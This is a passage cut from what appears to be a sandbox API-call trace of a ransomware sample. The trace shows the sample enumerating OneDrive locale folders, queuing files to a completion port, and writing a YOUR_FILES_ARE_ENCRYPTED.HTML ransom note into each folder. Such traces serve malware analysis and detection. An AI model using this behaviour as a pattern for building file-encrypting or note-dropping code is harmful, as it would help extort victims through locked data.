param_1="6C") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="73") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="82") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="DE") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="42") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="7F") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="90") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0E") returned 2 [0162.440] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" [0162.440] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.440] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.440] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-cyrl-ba", cAlternateFileName="SR-CYR~1")) returned 1 [0162.441] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba") returned 82 [0162.441] GetProcessHeap () returned 0x270000 [0162.441] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.441] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba" [0162.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*" [0162.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.441] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.441] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.441] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.442] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.442] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.442] lstrlenW (lpString=".mui") returned 4 [0162.442] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.442] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.442] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.442] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-cyrl-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.442] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.445] CloseHandle (hObject=0x5ac) returned 1 [0162.446] GetProcessHeap () returned 0x270000 [0162.446] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.446] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-cyrl-rs", cAlternateFileName="SR-CYR~2")) returned 1 [0162.447] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs") returned 82 [0162.447] GetProcessHeap () returned 0x270000 [0162.447] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.447] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs" [0162.447] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*" [0162.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.447] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.447] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.447] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.447] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.447] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.447] lstrlenW (lpString=".mui") returned 4 [0162.448] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.448] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.448] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.448] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-cyrl-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.448] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.451] CloseHandle (hObject=0x5ac) returned 1 [0162.451] GetProcessHeap () returned 0x270000 [0162.452] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.452] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-latn-rs", cAlternateFileName="SR-LAT~1")) returned 1 [0162.452] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs") returned 82 [0162.452] GetProcessHeap () returned 0x270000 [0162.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.453] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs" [0162.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*" [0162.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.456] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.456] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.456] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.456] lstrlenW (lpString=".mui") returned 4 [0162.456] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.456] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.456] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-latn-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.467] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.506] CloseHandle (hObject=0x5ac) returned 1 [0162.507] GetProcessHeap () returned 0x270000 [0162.507] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.507] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sv", cAlternateFileName="")) returned 1 [0162.508] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv") returned 74 [0162.508] GetProcessHeap () returned 0x270000 [0162.508] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.508] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv" [0162.508] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*" [0162.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.511] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.511] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.511] lstrlenW (lpString=".mui") returned 4 [0162.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.511] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.511] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.512] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.514] CloseHandle (hObject=0x5ac) returned 1 [0162.514] GetProcessHeap () returned 0x270000 [0162.515] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.515] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 